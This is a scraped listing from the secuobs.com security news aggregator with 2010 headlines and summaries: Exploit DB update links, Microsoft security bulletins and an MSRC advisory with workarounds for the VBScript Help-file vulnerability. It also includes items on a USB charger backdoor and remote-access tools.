http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2010-03-15 18:03:10 - Exploit DB updates : http://www.secuobs.com/revue/news/201744.shtmlhttp://www.secuobs.com/revue/news/201744.shtml 2010-03-15 14:02:05 - SANS Internet Storm Center InfoCON green : Observant reader Roy caught an interesting exploit attempt against his SMTP server His review of th more http://www.secuobs.com/revue/news/201663.shtmlhttp://www.secuobs.com/revue/news/201663.shtml 2010-03-15 00:19:12 - Exploit DB updates : http://www.secuobs.com/revue/news/201545.shtmlhttp://www.secuobs.com/revue/news/201545.shtml 2010-03-14 22:21:07 - Exploit DB updates : http://www.secuobs.com/revue/news/201523.shtmlhttp://www.secuobs.com/revue/news/201523.shtml 2010-03-14 22:21:07 - Exploit DB updates : http://www.secuobs.com/revue/news/201519.shtmlhttp://www.secuobs.com/revue/news/201519.shtml 2010-03-14 15:59:09 - Exploit DB updates : http://www.secuobs.com/revue/news/201485.shtmlhttp://www.secuobs.com/revue/news/201485.shtml 2010-03-14 00:51:04 - Exploit DB updates : http://www.secuobs.com/revue/news/201430.shtmlhttp://www.secuobs.com/revue/news/201430.shtml 2010-03-12 01:49:48 - Exploit DB updates : http://www.secuobs.com/revue/news/200946.shtmlhttp://www.secuobs.com/revue/news/200946.shtml 2010-03-12 00:45:14 - Hack In The Box : Not too long ago, David Finland built a device capable of communicating with just about any model of iPod via the dock connector using an Arduino Nano, PodGizmo breakout board, an old USB iPod connector, and a momentary switch While it may not sound like a big deal, there is more to it than one might think namely programming a device in this case the Arduino Nano to be able to receive, interpret, and respond to messages sent from an iPod This means teaching it to speak Apple Accessory Protocol and, although proprietary in nature, it has been fairly well documented around the Internet Finland slung some code so that his iPod touch was hooked up to one of the famous Staples Easy buttons in his car Now he could easily play and pause his iPod touch without having to fiddle with the on-screen controls http://www.secuobs.com/revue/news/200901.shtmlhttp://www.secuobs.com/revue/news/200901.shtml 2010-03-11 13:59:42 - Exploit DB updates : http://www.secuobs.com/revue/news/200662.shtmlhttp://www.secuobs.com/revue/news/200662.shtml 2010-03-10 20:01:05 - Exploit DB updates : http://www.secuobs.com/revue/news/200344.shtmlhttp://www.secuobs.com/revue/news/200344.shtml 2010-03-10 14:09:23 - Exploit DB updates : http://www.secuobs.com/revue/news/200192.shtmlhttp://www.secuobs.com/revue/news/200192.shtml 2010-03-10 09:27:19 - Hak5 Xvid Large : Following up with last week's desktop sandboxing challenge Darren's taking a look at another kind of sandbox -- one for malware analysis Shannon thinks your VNC and SSH servers are pretty spiffy, but how about controlling your computer over twitter Free text messaging to your PC anyone http://www.secuobs.com/revue/news/200148.shtmlhttp://www.secuobs.com/revue/news/200148.shtml 2010-03-10 06:20:08 - SANS Internet Storm Center InfoCON green : Several readers have pointed us towards this advisory This Microsoft advisory outlines a vuln more http://www.secuobs.com/revue/news/200121.shtmlhttp://www.secuobs.com/revue/news/200121.shtml 2010-03-09 21:21:20 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update addresses a privately reported vulnerability in Windows Movie Maker and Microsoft Producer 2003 Windows Live Movie Maker, which is available for Windows Vista and Windows 7, is not affected by this vulnerability The vulnerability could allow remote code execution if an attacker sent a specially crafted Movie Maker or Microsoft Producer project file and persuaded the user to open the specially crafted file Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights http://www.secuobs.com/revue/news/199889.shtmlhttp://www.secuobs.com/revue/news/199889.shtml 2010-03-09 21:21:20 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update resolves seven privately reported vulnerabilities in Microsoft Office Excel The vulnerabilities could allow remote code execution if a user opens a specially crafted Excel file An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights http://www.secuobs.com/revue/news/199888.shtmlhttp://www.secuobs.com/revue/news/199888.shtml 2010-03-09 19:55:39 - Help Net Security News : TeamViewer released TeamViewer and TeamViewer Pro iPhone Designed for iPhone or iPod touch, from versions 221 and newer, the applications access or control remote Windows or Mac computers located a http://www.secuobs.com/revue/news/199864.shtmlhttp://www.secuobs.com/revue/news/199864.shtml 2010-03-09 19:18:01 - Exploit DB updates : http://www.secuobs.com/revue/news/199846.shtmlhttp://www.secuobs.com/revue/news/199846.shtml 2010-03-09 14:46:36 - Exploit DB updates : http://www.secuobs.com/revue/news/199729.shtmlhttp://www.secuobs.com/revue/news/199729.shtml 2010-03-09 00:35:47 - Packet Storm Security Exploits : The Spamassassin Milter plugin suffers from a remote root command execution vulnerability Full exploit details provided http://www.secuobs.com/revue/news/199542.shtmlhttp://www.secuobs.com/revue/news/199542.shtml 2010-03-08 15:18:55 - threatpost The First Stop for Security News : The United States Computer Emergency Response Team US-CERT has warned that the software included in the Energizer DUO USB battery charger contains a backdoor that allows unauthorized remote system access Shorten URL http threatpostcom en_us 3Mt Click to copy to clipboard or post to Twitter http://www.secuobs.com/revue/news/199341.shtmlhttp://www.secuobs.com/revue/news/199341.shtml 2010-03-07 21:36:28 - Exploit DB updates : http://www.secuobs.com/revue/news/199165.shtmlhttp://www.secuobs.com/revue/news/199165.shtml 2010-03-06 14:00:48 - Secumania Security Group Feeds : First remote code execution vulnerability affecting Microsoft Notepadvia innocent TXT documents Read the details http://www.secuobs.com/revue/news/198956.shtmlhttp://www.secuobs.com/revue/news/198956.shtml 2010-03-05 12:02:46 - Roger Halbheer on Security : You know that I rarely blog on Advisories we publish unless they are heavily critical I just want to make sure that you have seen this MSRC the Microsoft Security Response Center constantly updates this advisory with workarounds Please take this very, very serious Microsoft Security Advisory 961051 Details on updates by MSRC Details from Security Vulnerability Research Defense Limited Exploitation of Microsoft Security Advisory 961051 Microsoft Malware Protection Center Roger http://www.secuobs.com/revue/news/198477.shtmlhttp://www.secuobs.com/revue/news/198477.shtml 2010-03-05 00:50:30 - Exploit DB updates : http://www.secuobs.com/revue/news/198193.shtmlhttp://www.secuobs.com/revue/news/198193.shtml 2010-03-05 00:50:30 - Exploit DB updates : http://www.secuobs.com/revue/news/198192.shtmlhttp://www.secuobs.com/revue/news/198192.shtml 2010-03-04 17:28:57 - Skypher : Today I am releasing another old project called ASPsh The goal of this project was to create an ASP page that can be used on a server to provide a command line shell -like experience when opening the page in a webbrowser http://www.secuobs.com/revue/news/198052.shtmlhttp://www.secuobs.com/revue/news/198052.shtml 2010-03-04 17:04:44 - 4sysops : The name of this Open Source task manager doesn t really fit It is not just another process monitor Perhaps THE Process Monitor would be a better name I can already see your eyebrows rising Better than Sysinternals Process Explorer Well, yes Better Much better First to consider is its modern user interface, complete with ribbon and http://www.secuobs.com/revue/news/198039.shtmlhttp://www.secuobs.com/revue/news/198039.shtml 2010-03-04 06:56:44 - SecurityTube.Net : DATEV ActiveX Control Remote Command Execution Metasploit Demo Video Tutorial IMAGE http://www.secuobs.com/revue/news/197928.shtmlhttp://www.secuobs.com/revue/news/197928.shtml 2010-03-04 04:58:29 - News : Remote desktop tools are the only practical access solution for deskbound workers who are only occasionally out of the office, but should you use a hosted service or an appliance IMAGE http://www.secuobs.com/revue/news/197890.shtmlhttp://www.secuobs.com/revue/news/197890.shtml 2010-03-04 01:55:34 - Exploit DB updates : http://www.secuobs.com/revue/news/197836.shtmlhttp://www.secuobs.com/revue/news/197836.shtml 2010-03-03 22:13:35 - Exploit DB updates : http://www.secuobs.com/revue/news/197735.shtmlhttp://www.secuobs.com/revue/news/197735.shtml 2010-03-03 18:02:35 - Cisco Security AdvisoriesSearch Cisco : A vulnerability exists in the Cisco Digital Media Player that could allow an unauthenticated attacker to inject video or data content into a remote display IMAGE http://www.secuobs.com/revue/news/197649.shtmlhttp://www.secuobs.com/revue/news/197649.shtml 2010-03-02 23:02:09 - News : Your iPhone can already control your television--sort of If you use a TiVo or a Mac mini or an Apple TV to power your media center, numerous iPhone apps can take the place of your remote control But all those remote apps, by necessity, eschew the way that virtually every remote control on the planet works Infrared IR blasting To help bridge that divide, ThinkFlood has announced the RedEye mini IMAGE http://www.secuobs.com/revue/news/197328.shtmlhttp://www.secuobs.com/revue/news/197328.shtml 2010-03-02 20:57:32 - Bill Mullins' Weblog Tech Thoughts : If you re the person who s often asked by friends, to help them, their friends, their neighbors, the list goes on, to reconstruct a computer that is not responding appropriately, has become loaded with malware, etc, then LogMeIn Express Beta is worth taking a look at Running this free screen sharing remote control application is simple http://www.secuobs.com/revue/news/197268.shtmlhttp://www.secuobs.com/revue/news/197268.shtml 2010-03-02 16:43:19 - Sunnet Beskerming Security Advisories : Microsoft have recently identified an odd vulnerability that utilises VBScript via Internet Explorer to run arbitrary code, all through seemingly-innocuous help files From Microsoft's Advisory, any successful exploit requires user interaction, getting the user to press the F1 key after being prompted by a dialog box, nominally bringing up the help function A weakness in the interaction of VBScript and Windows Help files when using Internet Explorer is the root cause of the vulnerability Vulnerable systems include Windows 2000, XP, and 2003 and with the vulnerability having been disclosed publicly before Microsoft were made aware of it, there is a higher risk of successful exploitation than with Microsoft's normal vulnerability disclosure and patching methods At this stage, there are not any reported attacks making use of this vulnerability Mitigating the risk of compromise is the requirement for user interaction, with successful attack only gaining the rights of the current user Microsoft's suggested workarounds include not pressing the F1 key when prompted by a website, restricting access to the Windows Help System effectively disabling it system-wide , and changing the security and scripting settings within Internet Explorer Relying on user behaviour not to press a key when prompted, and effectively neutering much of the Internet don't really seem like viable long term workarounds for the vulnerability With the Security Bulletins for March only a week away, it is unlikely that a patch will be available in this month's release IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/197152.shtmlhttp://www.secuobs.com/revue/news/197152.shtml 2010-03-02 16:20:48 - Exploit DB updates : http://www.secuobs.com/revue/news/197147.shtmlhttp://www.secuobs.com/revue/news/197147.shtml 2010-03-02 03:13:53 - Security Research Defense : The MSRC Engineering team has been investigating reports of a vulnerability involving the use of VBScript and Windows Help files What is the impact and affected platforms Our investigation has determined that Windows 7, Windows Server 2008, and Windows Vista are not impacted Only Windows 2000 and Windows XP are impacted by default Windows 2003 Server is also impacted, but the issue is mitigated in the default configuration due to the presence of the Internet Explorer Enhanced Security Configuration With this issue, it is possible for a malicious web page to display a dialog box which will trigger the execution of arbitrary code when the user presses the F1 key The prompt can appear repeatedly when dismissed, nagging the user to press the F1 key Platforms are affected regardless of the Internet Explorer version installed How would a malicious user leverage this vulnerability Windows Help files are an inherently unsafe file format That means these files can run arbitrary code, thus the browser must prevent remote Windows Help files from executing automatically VBScript functionality available from within Internet Explorer exposes the MsgBox function, allowing script on a web page to display a message to the user The parameters supplied to the MsgBox function may reference an associated Window Help file, though this functionality is limited when VBScript is used within the browser Though user interaction is required the F1 keyboard shortcut does enable an attack scenario In the exploit, a file path enables a HLP file to be loaded from the local filesystem, SMB, or WebDav Workarounds As an interim workaround, users are advised to avoid pressing F1 on dialogs presented from web pages or other Internet content If a dialog box appears repeatedly in an attempt to convince the user to press F1, users may log off the system or use Task Manager to kill the Internet Explorer process It is also possible to use the following command line to lock down the legacy Windows Help system, preventing it from loading cacls pourcentswindirpourcents winhlp32exe E P everyone N Command line to roll back this change cacls pourcentswindirpourcents winhlp32exe E R everyone As this vulnerability is driven by scripting, the following standard workarounds apply as well Set Internet and Local intranet security zone settings to High to prompt before running ActiveX Controls and Active Scripting in these zones You can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to prompt before running ActiveX controls and Active Scripting You can do this by setting your browser security to High To raise the browsing security level in Internet Explorer, follow these steps 1 On the Internet Explorer Tools menu, click Internet Options 2 In the Internet Options dialog box, click the Security tab, and then click the Internet icon 3 Under Security level for this zone, move the slider to High This sets the security level for all Web sites you visit to High Note If no slider is visible, click Default Level, and then move the slider to High Note Setting the level to High may cause some Web sites to work incorrectly If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites This will allow the site to work correctly even with the security setting set to High Impact of workaround There are side effects to prompting before running ActiveX Controls and Active Scripting Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements Prompting before running ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites You will be prompted frequently when you enable this workaround For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX Controls or Active Scripting If you do not want to be prompted for all these sites, use the steps outlined in Add sites that you trust to the Internet Explorer Trusted sites zone Add sites that you trust to the Internet Explorer Trusted sites zone After you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites We recommend that you add only sites that you trust to the Trusted sites zone To do this, follow these steps 1 In Internet Explorer, click Tools, click Internet Options, and then click the Security tab 2 In the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites 3 If you want to add sites that do not require an encrypted channel, click to clear the Require server verification https for all sites in this zone check box 4 In the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add 5 Repeat these steps for each site that you want to add to the zone 6 Click OK two times to accept the changes and return to Internet Explorer Note Add any sites that you trust not to take malicious action on your system Two in particular that you may want to add are windowsupdatemicrosoftcom and updatemicrosoftcom These are the sites that will host the update, and it requires an ActiveX Control to install the update Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone You can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone To do this, follow these steps 1 In Internet Explorer, click Internet Options on the Tools menu 2 Click the Security tab 3 Click Internet, and then click Custom Level 4 Under Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK 5 Click Local intranet, and then click Custom Level 6 Under Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK 7 Click OK two times to return to Internet Explorer Note Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites This will allow the site to work correctly Impact of workaround There are side effects to prompting before running Active Scripting Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites You will be prompted frequently when you enable this workaround For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting If you do not want to be prompted for all these sites, use the steps outlined in Add sites that you trust to the Internet Explorer Trusted sites zone Add sites that you trust to the Internet Explorer Trusted sites zone After you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites We recommend that you add only sites that you trust to the Trusted sites zone To do this, follow these steps 1 In Internet Explorer, click Tools, click Internet Options, and then click the Security tab 2 In the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites 3 If you want to add sites that do not require an encrypted channel, click to clear the Require server verification https for all sites in this zone check box 4 In the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add 5 Repeat these steps for each site that you want to add to the zone 6 Click OK two times to accept the changes and return to Internet Explorer Note Add any sites that you trust not to take malicious action on your system Two in particular that you may want to add are windowsupdatemicrosoftcom and updatemicrosoftcom These are the sites that will host the update, and it requires an ActiveX Control to install the update The Group Policy setting to Turn off displaying the Internet Explorer Help Menu under the Category Path Computer Configuration Administrative Template Windows Components Internet Explorer is not a sufficient mitigation for this issue Acknowledgements Thanks to Robert Hensing for his work on the issue -David Ross, MSRC Engineering IMAGE http://www.secuobs.com/revue/news/196973.shtmlhttp://www.secuobs.com/revue/news/196973.shtml 2010-03-02 01:52:33 - Symantec Security Response Podcasts : Learn how the right security tools and practices can create a secure remote working environment for your small business http://www.secuobs.com/revue/news/196913.shtmlhttp://www.secuobs.com/revue/news/196913.shtml 2010-02-27 01:00:51 - Rootsecure.net : Remote Exploit KeyKeriki http://www.secuobs.com/revue/news/196113.shtmlhttp://www.secuobs.com/revue/news/196113.shtml 2010-02-25 12:56:07 - SecurityPark.net : Xtralis has donated an ADPRO remote video surveillance and perimeter protection solution to the Gosport and Fareham Inshore Rescue Service GAFIRS to support the service in its mission to provide free marine rescue cover in the Solent GAFIRS is a registered charity, independent of the Royal National Lifeboat Institute RNLI Its volunteer crews are on call 24 7, and respond to over 130 reque more http://www.secuobs.com/revue/news/195506.shtmlhttp://www.secuobs.com/revue/news/195506.shtml 2010-02-25 12:11:47 - Darknet The Darkside : http://www.secuobs.com/revue/news/195495.shtmlhttp://www.secuobs.com/revue/news/195495.shtml 2010-02-25 10:06:05 - Raymond.CC Blog : For the first time I was helping my friend to configure Kaspersky Anti-Virus 2010 Normally Kaspersky doesn t needs to be configured as the default settings are good enough However, seeing that my friend doesn t use POP3 emails and instant messaging so I thought that maybe disabling the Mail, Web and IM protection that is http://www.secuobs.com/revue/news/195471.shtmlhttp://www.secuobs.com/revue/news/195471.shtml 2010-02-25 00:25:59 - Exploit DB updates : http://www.secuobs.com/revue/news/195301.shtmlhttp://www.secuobs.com/revue/news/195301.shtml 2010-02-24 22:41:33 - Schneier on Security : It's a really creepy story A school issues laptops to students, and then remotely and surreptitiously turns on the camera Here's the lawsuit This is an excellent technical investivation of what actually happened This investigation into the remote spying allegedly being conducted against students at Lower Merion represents an attempt to find proof of spying and a look into the IMAGE http://www.secuobs.com/revue/news/195270.shtmlhttp://www.secuobs.com/revue/news/195270.shtml 2010-02-24 19:25:38 - Exploit DB updates : http://www.secuobs.com/revue/news/195189.shtmlhttp://www.secuobs.com/revue/news/195189.shtml 2010-02-24 14:01:35 - Harmony Security Blog : http://www.secuobs.com/revue/news/195060.shtmlhttp://www.secuobs.com/revue/news/195060.shtml 2010-02-24 07:51:27 - PenTestIT : What if you want to export all logs Application, Security and System from a system on your network What if you want to do the same for your local computer This is what you do - 1 Download Log Parser version 22 from Microsoft 2 Copy and run the respective file as and when required 3 IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/194978.shtmlhttp://www.secuobs.com/revue/news/194978.shtml 2010-02-24 03:47:03 - Exploit DB updates : http://www.secuobs.com/revue/news/194926.shtmlhttp://www.secuobs.com/revue/news/194926.shtml 2010-02-23 17:57:23 - Exploit DB updates : http://www.secuobs.com/revue/news/194715.shtmlhttp://www.secuobs.com/revue/news/194715.shtml 2010-02-22 15:12:55 - Exploit DB updates : http://www.secuobs.com/revue/news/194155.shtmlhttp://www.secuobs.com/revue/news/194155.shtml 2010-02-22 15:12:55 - Exploit DB updates : http://www.secuobs.com/revue/news/194154.shtmlhttp://www.secuobs.com/revue/news/194154.shtml 2010-02-22 13:28:19 - Exploit DB updates : http://www.secuobs.com/revue/news/194112.shtmlhttp://www.secuobs.com/revue/news/194112.shtml 2010-02-21 13:15:53 - Security Bloggers Network : Trustwave's recently published 2010 Global Security Report shows that the top two attack vectors, by far, resulting in breaches are Remote Access Applications and Third Party Connections Here is the list of the top five 95pourcents Remote Access Application 90pourcents Third Party Connection 15pourcents SQL Injection 10pourcents Exposed Services 5pourcents Remote File Inclusion Clearly for each breach they investigated, there was more than one attack vector It's also important to note that 98pourcents of their investigations were on Payment Card Data breaches No surprise since Trustwave is focused primarily on PCI compliance The report does http://www.secuobs.com/revue/news/193933.shtmlhttp://www.secuobs.com/revue/news/193933.shtml 2010-02-20 16:33:53 - Exploit DB updates : http://www.secuobs.com/revue/news/193810.shtmlhttp://www.secuobs.com/revue/news/193810.shtml 2010-02-20 16:33:53 - Exploit DB updates : http://www.secuobs.com/revue/news/193809.shtmlhttp://www.secuobs.com/revue/news/193809.shtml 2010-02-20 00:14:24 - Exploit DB updates : http://www.secuobs.com/revue/news/193707.shtmlhttp://www.secuobs.com/revue/news/193707.shtml 2010-02-19 17:13:06 - Exploit DB updates : http://www.secuobs.com/revue/news/193573.shtmlhttp://www.secuobs.com/revue/news/193573.shtml 2010-02-19 17:13:06 - Exploit DB updates : http://www.secuobs.com/revue/news/193572.shtmlhttp://www.secuobs.com/revue/news/193572.shtml 2010-02-19 02:04:28 - Exploit DB updates : http://www.secuobs.com/revue/news/193360.shtmlhttp://www.secuobs.com/revue/news/193360.shtml 2010-02-18 14:41:00 - Exploit DB updates : http://www.secuobs.com/revue/news/193154.shtmlhttp://www.secuobs.com/revue/news/193154.shtml 2010-02-18 14:41:00 - Exploit DB updates : http://www.secuobs.com/revue/news/193152.shtmlhttp://www.secuobs.com/revue/news/193152.shtml 2010-02-18 06:15:30 - News : There's quite a market for apps that allow you to control your computer remotely from your iPhone Some are relatively simple, like apps that simulate Bluetooth number pads, or provide convenient access to keyboard shortcuts for professional-grade software But for software that lets you control your computer from anywhere in the world--as though you were right in front of the monitor--LogMeIn Ignition is a very strong contender IMAGE http://www.secuobs.com/revue/news/193074.shtmlhttp://www.secuobs.com/revue/news/193074.shtml 2010-02-17 20:14:25 - CGISecurity Website and Application Security News : Brian Holyfield has published an entry on using Windows WCF to perform backend port scanning This is possible due to the callback functionality WCF provides From his article Last weekend at Shmoocon, I demonstrated how an attacker can trick certain WCF web services into performing an unauthorized port scan of machines behind http://www.secuobs.com/revue/news/192841.shtmlhttp://www.secuobs.com/revue/news/192841.shtml 2010-02-17 15:19:36 - Infosecurity.US : Novell Inc s NasdaqGS NOVL Linux unit SuSE Linux has released via the Security Announce list RPMs targeting the operating systems kernel, in an effort to mitigate flaws manifesting as Remote Denial of Service and Local Privilege Escalation vulnerabilities More information, including the full text of the announcement, enumerated http://www.secuobs.com/revue/news/192741.shtmlhttp://www.secuobs.com/revue/news/192741.shtml 2010-02-17 14:49:59 - Exploit DB updates : http://www.secuobs.com/revue/news/192731.shtmlhttp://www.secuobs.com/revue/news/192731.shtml 2010-02-16 19:01:25 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/192381.shtmlhttp://www.secuobs.com/revue/news/192381.shtml 2010-02-16 16:40:28 - How to remove : This file name 51Remoteexe has appeared in an virus analysis report You can see the report on this linkThis virus installer is 590 KB originated in ChinaIt creates a malicious service named 51RemoteServer2010 51Remote2010It may download more Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/192330.shtmlhttp://www.secuobs.com/revue/news/192330.shtml 2010-02-16 02:35:12 - Exploit DB updates : http://www.secuobs.com/revue/news/192171.shtmlhttp://www.secuobs.com/revue/news/192171.shtml 2010-02-16 01:25:37 - Exploit DB updates : http://www.secuobs.com/revue/news/192145.shtmlhttp://www.secuobs.com/revue/news/192145.shtml 2010-02-15 23:17:28 - Exploit DB updates : http://www.secuobs.com/revue/news/192104.shtmlhttp://www.secuobs.com/revue/news/192104.shtml 2010-02-15 20:01:58 - News : Ericsson is showing off a prototype of its Android-based IPTV Remote, which allows users to control TVs throughout their homes, as well as heating systems The prototype has a 10-inch touchscreen, a forward-facing camera and speakers and could also be used as a mobile phone and to browse the Web, the Swedish company said Monday at Mobile World Congress IMAGE http://www.secuobs.com/revue/news/192047.shtmlhttp://www.secuobs.com/revue/news/192047.shtml 2010-02-15 17:19:10 - Exploit DB updates : http://www.secuobs.com/revue/news/191991.shtmlhttp://www.secuobs.com/revue/news/191991.shtml 2010-02-15 17:19:10 - Exploit DB updates : http://www.secuobs.com/revue/news/191989.shtmlhttp://www.secuobs.com/revue/news/191989.shtml 2010-02-14 22:25:59 - Exploit DB updates : http://www.secuobs.com/revue/news/191826.shtmlhttp://www.secuobs.com/revue/news/191826.shtml 2010-02-14 19:33:36 - Exploit DB updates : http://www.secuobs.com/revue/news/191817.shtmlhttp://www.secuobs.com/revue/news/191817.shtml 2010-02-14 19:33:36 - Exploit DB updates : http://www.secuobs.com/revue/news/191816.shtmlhttp://www.secuobs.com/revue/news/191816.shtml 2010-02-14 19:33:36 - Exploit DB updates : http://www.secuobs.com/revue/news/191815.shtmlhttp://www.secuobs.com/revue/news/191815.shtml 2010-02-14 11:56:19 - Reverse Engineering : submitted by wtbw link comment http://www.secuobs.com/revue/news/191770.shtmlhttp://www.secuobs.com/revue/news/191770.shtml 2010-02-14 07:44:41 - Exploit DB updates : http://www.secuobs.com/revue/news/191757.shtmlhttp://www.secuobs.com/revue/news/191757.shtml 2010-02-13 21:58:43 - Hack a Day : The headphone remote for the third generation iPod shuffle has a special chip that identifies it to the iPod itself David Carne posted an in-depth report about the process he used to reverse engineering that protocol He s discovered that the remote uses a peculiar signal to identify it as authentic when the device powers up http://www.secuobs.com/revue/news/191722.shtmlhttp://www.secuobs.com/revue/news/191722.shtml 2010-02-13 15:45:29 - Exploit DB updates : http://www.secuobs.com/revue/news/191673.shtmlhttp://www.secuobs.com/revue/news/191673.shtml 2010-02-13 14:53:30 - Exploit DB updates : http://www.secuobs.com/revue/news/191669.shtmlhttp://www.secuobs.com/revue/news/191669.shtml 2010-02-13 01:43:47 - Exploit DB updates : http://www.secuobs.com/revue/news/191564.shtmlhttp://www.secuobs.com/revue/news/191564.shtml 2010-02-12 16:55:09 - Exploit DB updates : http://www.secuobs.com/revue/news/191396.shtmlhttp://www.secuobs.com/revue/news/191396.shtml 2010-02-12 16:55:09 - Exploit DB updates : http://www.secuobs.com/revue/news/191395.shtmlhttp://www.secuobs.com/revue/news/191395.shtml 2010-02-12 15:10:43 - GDS Security Blog : Last weekend at Shmoocon, I demonstrated how an attacker can trick certain WCF web services into performing an unauthorized port scan of machines behind a firewall For those that were not able to attend the talk, the slides are posted here The part that covers the port scanning technique may not be clear in isolation, so http://www.secuobs.com/revue/news/191358.shtmlhttp://www.secuobs.com/revue/news/191358.shtml 2010-02-11 02:17:32 - SOURCE Conference Blog : Data can reside anywhere and Splunk recognizes that fact by providing the concept of forwarders The Splunk Forwarder will collect data locally and send it to a central Splunk indexer which may reside in a remote location One of the great advantages of this approach is that forwarders maintain an internal index for where they left off when sending data If for some reason the Splunk Indexer has to be taken offline, the forwarder can resume its task after the indexer is brought back up Another advantage to forwarders is that they can load balance delivery to multiple indexers Even a Splunk Light Forwarder a forwarder that consumes minimal CPU resources and network bandwidth can participate in an auto load http://www.secuobs.com/revue/news/190741.shtmlhttp://www.secuobs.com/revue/news/190741.shtml 2010-02-10 18:34:40 - Max's blog : Hey people, since backtrack is now not on remote-exploitorg anymore, i decided to blog straight into the news area on the website so please go to http wwwremote-exploitorg for new posts greetings max http://www.secuobs.com/revue/news/190558.shtmlhttp://www.secuobs.com/revue/news/190558.shtml 2010-02-10 05:19:33 - Breaking Code : A 17 year old remote vulnerability has been found on almost all Windows versions ranging from NT to the latest 7 that allows an attacker to read and write any files, upload executables and run them Found by Hernan Ochoa and Agustin Azubel http wwwhexaleorg advisories OCHOA-2010-0209txt http://www.secuobs.com/revue/news/190359.shtmlhttp://www.secuobs.com/revue/news/190359.shtml 2010-02-10 02:51:12 - Exploit DB updates : http://www.secuobs.com/revue/news/190295.shtmlhttp://www.secuobs.com/revue/news/190295.shtml 2010-02-10 02:51:12 - Exploit DB updates : http://www.secuobs.com/revue/news/190294.shtmlhttp://www.secuobs.com/revue/news/190294.shtml 2010-02-09 21:59:47 - Exploit DB updates : http://www.secuobs.com/revue/news/190185.shtmlhttp://www.secuobs.com/revue/news/190185.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update resolves a privately reported vulnerability in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights http://www.secuobs.com/revue/news/190179.shtmlhttp://www.secuobs.com/revue/news/190179.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update resolves six privately reported vulnerabilities in Microsoft Office PowerPoint The vulnerabilities could allow remote code execution if a user opens a specially crafted PowerPoint file An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights http://www.secuobs.com/revue/news/190178.shtmlhttp://www.secuobs.com/revue/news/190178.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Moderate - This security update resolves a privately reported vulnerability in Microsoft Paint The vulnerability could allow remote code execution if a user viewed a specially crafted JPEG image file using Microsoft Paint Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights http://www.secuobs.com/revue/news/190177.shtmlhttp://www.secuobs.com/revue/news/190177.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Critical - This security update resolves two privately reported vulnerabilities in Microsoft Windows The vulnerabilities could allow remote code execution if an attacker sent a specially crafted SMB response to a client-initiated SMB request To exploit these vulnerabilities, an attacker must convince the user to initiate an SMB connection to a malicious SMB server http://www.secuobs.com/revue/news/190176.shtmlhttp://www.secuobs.com/revue/news/190176.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Critical - This security update resolves a privately reported vulnerability in Microsoft Windows 2000, Windows XP, and Windows Server 2003 Other versions of Windows are not impacted by this security update The vulnerability could allow remote code execution if an application, such as a Web browser, passes specially crafted data to the ShellExecute API function through the Windows Shell Handler http://www.secuobs.com/revue/news/190175.shtmlhttp://www.secuobs.com/revue/news/190175.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Critical - This security update resolves four privately reported vulnerabilities in Microsoft Windows The most severe of these vulnerabilities could allow remote code execution if specially crafted packets are sent to a computer with IPv6 enabled An attacker could try to exploit the vulnerability by creating specially crafted ICMPv6 packets and sending the packets to a system with IPv6 enabled This vulnerability may only be exploited 